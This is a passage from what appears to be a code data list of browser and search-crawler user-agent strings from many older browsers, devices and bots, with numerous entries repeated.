'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
